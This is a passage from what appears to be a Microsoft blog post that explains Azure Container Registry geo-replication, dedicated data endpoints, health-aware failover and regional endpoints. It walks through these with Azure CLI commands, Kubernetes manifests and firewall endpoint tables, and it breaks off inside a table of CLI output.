&lt;P&gt;&lt;STRONG&gt;Regional by design.&lt;/STRONG&gt; &lt;STRONG&gt;Dedicated data endpoints always land you on a specific geo-replica's data endpoint — there is no "global data endpoint."&lt;/STRONG&gt; With the global endpoint as your registry endpoint, the 307 redirect picks the data endpoint for whichever region the global endpoint chose to serve you. With a regional endpoint pinned to a specific region, the 307 always redirects you to that&amp;nbsp;&lt;STRONG&gt;same region's&lt;/STRONG&gt; data endpoint — never cross-region.&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Why dedicated data endpoints matter.&lt;/STRONG&gt; &lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/container-registry/container-registry-dedicated-data-endpoints" target="_blank" rel="noopener"&gt;Dedicated data endpoints&lt;/A&gt; are a Premium SKU feature that exists primarily to address security and firewall scoping. By default, layer downloads redirect to &lt;CODE&gt;*.blob.core.windows.net&lt;/CODE&gt; — a wildcard storage FQDN. Firewall rules to allow that wildcard either let &lt;EM&gt;all&lt;/EM&gt; Azure storage accounts through or none of them, which raises data exfiltration concerns and isn't tightly scoped to your registry. &lt;STRONG&gt;Dedicated data endpoints replace the wildcard with a fully qualified domain in your registry's own domain — &lt;CODE&gt;myregistry.&amp;lt;region&amp;gt;.data.azurecr.io&lt;/CODE&gt;&lt;/STRONG&gt; — so firewall rules can be scoped tightly to your specific registry, in your specific regions.&lt;/P&gt;
&lt;P&gt;That same design choice can also make layer downloads more predictable during routing changes. &lt;STRONG&gt;With dedicated data endpoints, the data endpoint FQDN is known ahead of time and lives in the registry's domain&lt;/STRONG&gt; — one predictable hostname per region, configured once. Without them, the layer download has to resolve a wildcard storage FQDN that points to whichever storage account the registry happens to have provisioned, which is a separate DNS resolution path with its own routing behavior and its own caching profile. Dedicated data endpoints simplify the DNS picture by aligning the data path with the registry path and keeping the entire pull experience inside one set of predictable, scoped FQDNs.&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;For any geo-replicated registry where security and high availability matter, enable dedicated data endpoints.&lt;/STRONG&gt;&lt;/P&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;&lt;STRONG&gt;Note:&lt;/STRONG&gt; Health-aware failover applies only to operations against the global endpoint, not to regional endpoints or dedicated data endpoints. &lt;STRONG&gt;Take note that health-aware failover only kicks in and directs traffic away from a geo-replica when an Azure region is experiencing significant infrastructure degradation. At this stage, it does not kick in to redirect traffic to another geo-replica if a client's data plane API requests are throttled. &lt;/STRONG&gt;See the relevant section below for the full scope when health-aware auto failover kicks in or not.&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;H3 id="the-three-traffic-control-tools"&gt;The three traffic control tools&lt;/H3&gt;
&lt;P&gt;ACR geo-replication gives you three complementary tools for controlling where traffic lands. Each one solves a different class of problem, and customers most often run into trouble when they reach for the wrong one. We name them up front and use these names throughout the post:&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table border="1" style="border-width: 1px;"&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Tool&lt;/th&gt;&lt;th&gt;Who controls it&lt;/th&gt;&lt;th&gt;What it does&lt;/th&gt;&lt;th&gt;Use cases&lt;/th&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;&lt;STRONG&gt;Health-aware failover&lt;/STRONG&gt;&lt;/td&gt;&lt;td&gt;Platform (automatic)&lt;/td&gt;&lt;td&gt;Reroutes the global endpoint away from a region whose registry can't reliably serve requests&lt;/td&gt;&lt;td&gt;Regional incidents, automatic recovery&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;STRONG&gt;Replica enable/disable for global routing&lt;/STRONG&gt;&lt;/td&gt;&lt;td&gt;Customer (manual)&lt;/td&gt;&lt;td&gt;Excludes a specific replica from global endpoint routing without deleting it; data continues syncing&lt;/td&gt;&lt;td&gt;DR rehearsals, planned maintenance, quarantining a replica without losing it&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;STRONG&gt;Regional endpoints&lt;/STRONG&gt;&lt;/td&gt;&lt;td&gt;Customer (per request)&lt;/td&gt;&lt;td&gt;Dedicated per-region URLs (&lt;CODE&gt;myregistry.&amp;lt;region&amp;gt;.geo.azurecr.io&lt;/CODE&gt;) that bypass the internal traffic manager entirely&lt;/td&gt;&lt;td&gt;Pinning AKS clusters to co-located replicas, push/pull consistency, capacity planning, troubleshooting, client-side failover&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;colgroup&gt;&lt;col style="width: 25.00%" /&gt;&lt;col style="width: 25.00%" /&gt;&lt;col style="width: 25.00%" /&gt;&lt;col style="width: 25.00%" /&gt;&lt;/colgroup&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P&gt;Health-aware failover and replica enable/disable both act on the &lt;STRONG&gt;global endpoint&lt;/STRONG&gt;. Regional endpoints are a separate URL surface that &lt;STRONG&gt;coexists&lt;/STRONG&gt; with the global endpoint — enabling them does not disable the global endpoint&amp;nbsp;&lt;CODE&gt;myregistry.azurecr.io&lt;/CODE&gt;. You can use both simultaneously and choose per workload.&lt;/P&gt;
&lt;H3 id="the-behavior-in-question"&gt;The behavior in question&lt;/H3&gt;
&lt;P&gt;When the registry in one region experiences a real degradation, there are three possible answers to "what happens?":&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;(A)&lt;/STRONG&gt; Nothing automatic. The customer must manually disable the affected region's endpoint to stop traffic from being routed there.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;(B)&lt;/STRONG&gt; The system detects the regional front-door failure and reroutes within seconds.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;(C)&lt;/STRONG&gt; A per-registry health evaluation detects the degradation and reroutes the global endpoint within minutes, with no customer action. After the region recovers, routing resumes automatically.&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;The answer today is &lt;STRONG&gt;(C)&lt;/STRONG&gt;. Before health-aware failover, customers were stuck closer to &lt;STRONG&gt;(A)&lt;/STRONG&gt; — the system could see whether the regional reverse proxy responded, but not whether the registry could actually serve real pull and push traffic end to end. Health-aware failover closes that gap.&lt;/P&gt;
&lt;P&gt;We walk through all three tools in the next section, in order: setting up geo-replication, using regional endpoints to pin specific workloads, keeping the global endpoint for everything else, the manual replica disable mechanism, re-enabling participation in global routing, and what to expect when health-aware failover triggers.&lt;/P&gt;
&lt;H2 id="walkthrough"&gt;Walkthrough&lt;/H2&gt;
&lt;P&gt;The following steps assume an existing Premium SKU registry and the Azure CLI logged in. We use &lt;CODE&gt;myregistry&lt;/CODE&gt; as the registry name, &lt;CODE&gt;myrg&lt;/CODE&gt; as the resource group, and &lt;CODE&gt;eastus&lt;/CODE&gt; as the home region. Substitute &lt;CODE&gt;&amp;lt;your-registry&amp;gt;&lt;/CODE&gt;, &lt;CODE&gt;&amp;lt;your-rg&amp;gt;&lt;/CODE&gt;, and &lt;CODE&gt;&amp;lt;your-region&amp;gt;&lt;/CODE&gt; for your environment.&lt;/P&gt;
&lt;H3 id="prerequisites"&gt;Prerequisites&lt;/H3&gt;
&lt;UL&gt;
&lt;LI&gt;A Premium SKU ACR registry (geo-replication requires Premium)&lt;/LI&gt;
&lt;LI&gt;Azure CLI (&lt;CODE&gt;az&lt;/CODE&gt;) installed and logged in&lt;/LI&gt;
&lt;LI&gt;For regional endpoints (Step 2a): Azure CLI 2.86.0 or later. All regional endpoints commands (&lt;CODE&gt;--regional-endpoints&lt;/CODE&gt;, &lt;CODE&gt;az acr show-endpoints&lt;/CODE&gt;, &lt;CODE&gt;az acr login --endpoint&lt;/CODE&gt;) are available natively in Azure CLI 2.86.0+. If you previously installed the &lt;CODE&gt;acrregionalendpoint&lt;/CODE&gt; private preview CLI extension, uninstall it with &lt;CODE&gt;az extension remove --name acrregionalendpoint&lt;/CODE&gt; to prevent conflicts with the built-in CLI commands.&lt;/LI&gt;
&lt;/UL&gt;
&lt;H3 id="step-1-add-a-west-us-replica-to-a-registry-that-lives-in-east-us"&gt;Step 1: Add a West US replica to a registry that lives in East US&lt;/H3&gt;
&lt;P&gt;Geo-replication requires the Premium SKU. The create call below fails on Basic or Standard.&lt;/P&gt;
&lt;PRE class="language-bash" tabindex="0" contenteditable="false" data-lia-code-value="# Confirm the registry is Premium
az acr show --name myregistry --resource-group myrg \
  --query sku.name --output tsv
# Premium

# Create a West US geo-replica
az acr replication create --registry myregistry --location westus

# Confirm both replicas are present
az acr replication list --registry myregistry --output table
"&gt;&lt;CODE&gt;# Confirm the registry is Premium
az acr show --name myregistry --resource-group myrg \
  --query sku.name --output tsv
# Premium

# Create a West US geo-replica
az acr replication create --registry myregistry --location westus

# Confirm both replicas are present
az acr replication list --registry myregistry --output table
&lt;/CODE&gt;&lt;/PRE&gt;
&lt;PRE&gt;&lt;CODE&gt;&lt;SPAN class="hljs-comment"&gt;NAME&lt;/SPAN&gt;    &lt;SPAN class="hljs-comment"&gt;LOCATION&lt;/SPAN&gt;    &lt;SPAN class="hljs-comment"&gt;PROVISIONING&lt;/SPAN&gt; &lt;SPAN class="hljs-comment"&gt;STATE&lt;/SPAN&gt;    &lt;SPAN class="hljs-comment"&gt;STATUS&lt;/SPAN&gt;    &lt;SPAN class="hljs-comment"&gt;REGION&lt;/SPAN&gt; &lt;SPAN class="hljs-comment"&gt;ENDPOINT&lt;/SPAN&gt; &lt;SPAN class="hljs-comment"&gt;ENABLED&lt;/SPAN&gt;
&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;  &lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;  &lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;  &lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;  &lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;
&lt;SPAN class="hljs-comment"&gt;eastus&lt;/SPAN&gt;  &lt;SPAN class="hljs-comment"&gt;eastus&lt;/SPAN&gt;      &lt;SPAN class="hljs-comment"&gt;Succeeded&lt;/SPAN&gt;             &lt;SPAN class="hljs-comment"&gt;online&lt;/SPAN&gt;    &lt;SPAN class="hljs-comment"&gt;True&lt;/SPAN&gt;
&lt;SPAN class="hljs-comment"&gt;westus&lt;/SPAN&gt;  &lt;SPAN class="hljs-comment"&gt;westus&lt;/SPAN&gt;      &lt;SPAN class="hljs-comment"&gt;Succeeded&lt;/SPAN&gt;             &lt;SPAN class="hljs-comment"&gt;online&lt;/SPAN&gt;    &lt;SPAN class="hljs-comment"&gt;True&lt;/SPAN&gt;
&lt;/CODE&gt;&lt;/PRE&gt;
&lt;P&gt;Pushes and pulls continue working through the existing replica throughout initial sync. Because the registry is multi-region, multi-write, the existing replica keeps serving traffic while the new replica catches up in the background. Initial replica seeding time is a function of &lt;STRONG&gt;registry size&lt;/STRONG&gt; — the total number and cumulative size of images already in the registry that need to be replicated to the new replica — not the size of any single image.&lt;/P&gt;
&lt;H3 id="step-2a-pin-workloads-to-specific-regions-using-regional-endpoints"&gt;Step 2a: Pin workloads to specific regions using regional endpoints&lt;/H3&gt;
&lt;P&gt;Use regional endpoints when a workload needs explicit per-region control. The five common cases:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;Regional affinity&lt;/STRONG&gt; — an AKS cluster in East US should pull from the East US replica, every time, without ever hopping to a more distant replica because of a network performance fluctuation.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Predictable routing&lt;/STRONG&gt; — workloads that need to know exactly which replica will serve them, for benchmarking, capacity planning, or in-region traffic SLAs.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Push/pull consistency&lt;/STRONG&gt; — pinning both ends of a publish-then-deploy flow to the same replica eliminates eventual-consistency races.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Troubleshooting&lt;/STRONG&gt; — reproducing an issue on a specific replica requires sending traffic to that specific replica.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Client-side failover&lt;/STRONG&gt; — customers with their own health checks and business rules want to implement failover on their own terms, on signals only they can see.&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;Enable regional endpoints on the registry:&lt;/P&gt;
&lt;PRE class="language-bash" tabindex="0" contenteditable="false" data-lia-code-value="az acr update -n myregistry -g myrg --regional-endpoints enabled
"&gt;&lt;CODE&gt;az acr update -n myregistry -g myrg --regional-endpoints enabled
&lt;/CODE&gt;&lt;/PRE&gt;
&lt;P&gt;When enabled, ACR automatically creates per-region login server URLs for &lt;STRONG&gt;every&lt;/STRONG&gt; existing geo-replica. No per-region configuration is needed.&lt;/P&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;&lt;STRONG&gt;Note:&lt;/STRONG&gt; Regional endpoints can be enabled on any Premium SKU registry, even without geo-replication. A registry without geo-replication has a single geo-replica in the home region, which gets one regional endpoint URL. However, the feature is most useful when your registry has at least two geo-replicas, where you can pin different workloads to different replicas for routing control and capacity distribution.&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;P&gt;Push to a specific region using its regional endpoint:&lt;/P&gt;
&lt;PRE class="language-bash" tabindex="0" contenteditable="false" data-lia-code-value="# Log in to the West US regional endpoint
az acr login --name myregistry --endpoint westus

# Tag and push using the regional endpoint URL
docker tag myapp:v1 myregistry.westus.geo.azurecr.io/myapp:v1
docker push myregistry.westus.geo.azurecr.io/myapp:v1
"&gt;&lt;CODE&gt;# Log in to the West US regional endpoint
az acr login --name myregistry --endpoint westus

# Tag and push using the regional endpoint URL
docker tag myapp:v1 myregistry.westus.geo.azurecr.io/myapp:v1
docker push myregistry.westus.geo.azurecr.io/myapp:v1
&lt;/CODE&gt;&lt;/PRE&gt;
&lt;P&gt;Pin AKS deployments to their co-located replica by using regional endpoint URLs in the deployment manifest. The example below shows two clusters in different regions; each cluster references the regional endpoint for its own region's replica (assuming replicas exist in both &lt;CODE&gt;eastus&lt;/CODE&gt; and &lt;CODE&gt;westeurope&lt;/CODE&gt;):&lt;/P&gt;
&lt;PRE class="language-yaml" tabindex="0" contenteditable="false" data-lia-code-value="# East US-based AKS cluster pulls from the East US replica
apiVersion: apps/v1
kind: Deployment
metadata:
  name: myapp-eastus
spec:
  template:
    spec:
      containers:
        - name: myapp
          image: myregistry.eastus.geo.azurecr.io/myapp:v1
---
# West Europe-based AKS cluster pulls from the West Europe replica
apiVersion: apps/v1
kind: Deployment
metadata:
  name: myapp-westeurope
spec:
  template:
    spec:
      containers:
        - name: myapp
          image: myregistry.westeurope.geo.azurecr.io/myapp:v1
"&gt;&lt;CODE&gt;# East US-based AKS cluster pulls from the East US replica
apiVersion: apps/v1
kind: Deployment
metadata:
  name: myapp-eastus
spec:
  template:
    spec:
      containers:
        - name: myapp
          image: myregistry.eastus.geo.azurecr.io/myapp:v1
---
# West Europe-based AKS cluster pulls from the West Europe replica
apiVersion: apps/v1
kind: Deployment
metadata:
  name: myapp-westeurope
spec:
  template:
    spec:
      containers:
        - name: myapp
          image: myregistry.westeurope.geo.azurecr.io/myapp:v1
&lt;/CODE&gt;&lt;/PRE&gt;
&lt;P&gt;This eliminates cross-region pulls when global routing would otherwise prefer a different replica for a given client, and it gives you a per-region traffic profile you can plan capacity against.&lt;/P&gt;
&lt;H4 id="regional-endpoint-operational-tips"&gt;Regional endpoint operational tips&lt;/H4&gt;
&lt;P&gt;&lt;STRONG&gt;View all endpoints.&lt;/STRONG&gt; Use &lt;CODE&gt;az acr show-endpoints&lt;/CODE&gt; to see all endpoint URLs for your registry — global, regional (if enabled), and dedicated data endpoints (if enabled):&lt;/P&gt;
&lt;PRE class="language-bash" tabindex="0" contenteditable="false" data-lia-code-value="az acr show-endpoints --name myregistry --resource-group myrg
"&gt;&lt;CODE&gt;az acr show-endpoints --name myregistry --resource-group myrg
&lt;/CODE&gt;&lt;/PRE&gt;
&lt;P&gt;&lt;STRONG&gt;Import from a specific geo-replica.&lt;/STRONG&gt; When importing images between registries, you can use a regional endpoint to import from a specific geo-replica of the source registry. This is useful when you want predictable network paths or need to import from a replica in a specific region:&lt;/P&gt;
&lt;PRE class="language-bash" tabindex="0" contenteditable="false" data-lia-code-value="az acr import \
  --name mydownstreamregistry \
  --source myupstreamregistry.westeurope.geo.azurecr.io/myapp:v1 \
  --image myapp:v1
"&gt;&lt;CODE&gt;az acr import \
  --name mydownstreamregistry \
  --source myupstreamregistry.westeurope.geo.azurecr.io/myapp:v1 \
  --image myapp:v1
&lt;/CODE&gt;&lt;/PRE&gt;
&lt;P&gt;&lt;STRONG&gt;Firewall rules for regional endpoints.&lt;/STRONG&gt; If you use firewall rules, allow access to the following endpoints for each geo-replica that clients connect to:&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table border="1" style="border-width: 1px;"&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Endpoint&lt;/th&gt;&lt;th&gt;Purpose&lt;/th&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;&lt;CODE&gt;myregistry.&amp;lt;region&amp;gt;.geo.azurecr.io&lt;/CODE&gt;&lt;/td&gt;&lt;td&gt;Regional endpoint for registry operations&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;CODE&gt;myregistry.azurecr.io&lt;/CODE&gt;&lt;/td&gt;&lt;td&gt;Global endpoint (if also used)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;CODE&gt;myregistry.&amp;lt;region&amp;gt;.data.azurecr.io&lt;/CODE&gt;&lt;/td&gt;&lt;td&gt;Layer downloads (if using private endpoints or dedicated data endpoints)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;CODE&gt;*.blob.core.windows.net&lt;/CODE&gt;&lt;/td&gt;&lt;td&gt;Layer downloads (if not using private endpoints or dedicated data endpoints)&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;colgroup&gt;&lt;col style="width: 50.00%" /&gt;&lt;col style="width: 50.00%" /&gt;&lt;/colgroup&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P&gt;For the full list of endpoint types and FQDN patterns, see the &lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/container-registry/container-registry-endpoint-reference" target="_blank" rel="noopener"&gt;ACR reference for various registry endpoints&lt;/A&gt;.&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;DNS-based routing without changing manifests.&lt;/STRONG&gt; If you don't want to maintain different deployment manifests per region, you can keep all manifests pointing to the global endpoint (&lt;CODE&gt;myregistry.azurecr.io&lt;/CODE&gt;) and use software-defined networking or a regional traffic manager to resolve the global endpoint to the appropriate regional endpoint based on the originating region's traffic. This achieves the same co-location goals as regional endpoints — predictable routing and reduced latency — without embedding region-specific URLs in your deployment manifests.&lt;/P&gt;
&lt;H3 id="step-2b-keep-using-the-global-endpoint-for-everything-else"&gt;Step 2b: Keep using the global endpoint for everything else&lt;/H3&gt;
&lt;P&gt;For workloads that don't need explicit pinning, &lt;STRONG&gt;do nothing&lt;/STRONG&gt;. The global endpoint at &lt;CODE&gt;myregistry.azurecr.io&lt;/CODE&gt; continues to work exactly as before, and the global endpoint plus health-aware failover gives you intelligent routing across replicas without configuration. ACR picks the best replica for each client based on network performance and reroutes during regional incidents.&lt;/P&gt;
&lt;P&gt;Regional endpoints &lt;STRONG&gt;coexist&lt;/STRONG&gt; with the global endpoint — enabling them does not disable &lt;CODE&gt;myregistry.azurecr.io&lt;/CODE&gt;. You can use both simultaneously and choose per workload, mixing pinned workloads (Step 2a) with workloads that ride the global endpoint (Step 2b) in the same registry.&lt;/P&gt;
&lt;H3 id="step-3-take-a-replica-out-of-global-endpoint-routing"&gt;Step 3: Take a replica out of global endpoint routing&lt;/H3&gt;
&lt;P&gt;Use this when you need to keep a replica alive but stop it from serving global-endpoint traffic — for DR rehearsals, planned maintenance, or troubleshooting an isolated replica.&lt;/P&gt;
&lt;PRE class="language-bash" tabindex="0" contenteditable="false" data-lia-code-value="# Exclude the West US replica from global endpoint routing
az acr replication update --registry myregistry --name westus \
  --global-endpoint-routing false
"&gt;&lt;CODE&gt;# Exclude the West US replica from global endpoint routing
az acr replication update --registry myregistry --name westus \
  --global-endpoint-routing false
&lt;/CODE&gt;&lt;/PRE&gt;
&lt;P&gt;Confirm the change:&lt;/P&gt;
&lt;PRE class="language-bash" tabindex="0" contenteditable="false" data-lia-code-value="az acr replication list --registry myregistry --output table
"&gt;&lt;CODE&gt;az acr replication list --registry myregistry --output table
&lt;/CODE&gt;&lt;/PRE&gt;
&lt;PRE&gt;&lt;CODE&gt;&lt;SPAN class="hljs-comment"&gt;NAME&lt;/SPAN&gt;    &lt;SPAN class="hljs-comment"&gt;LOCATION&lt;/SPAN&gt;    &lt;SPAN class="hljs-comment"&gt;PROVISIONING&lt;/SPAN&gt; &lt;SPAN class="hljs-comment"&gt;STATE&lt;/SPAN&gt;    &lt;SPAN class="hljs-comment"&gt;STATUS&lt;/SPAN&gt;    &lt;SPAN class="hljs-comment"&gt;REGION&lt;/SPAN&gt; &lt;SPAN class="hljs-comment"&gt;ENDPOINT&lt;/SPAN&gt; &lt;SPAN class="hljs-comment"&gt;ENABLED&lt;/SPAN&gt;
&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;  &lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;  &lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;  &lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;  &lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN 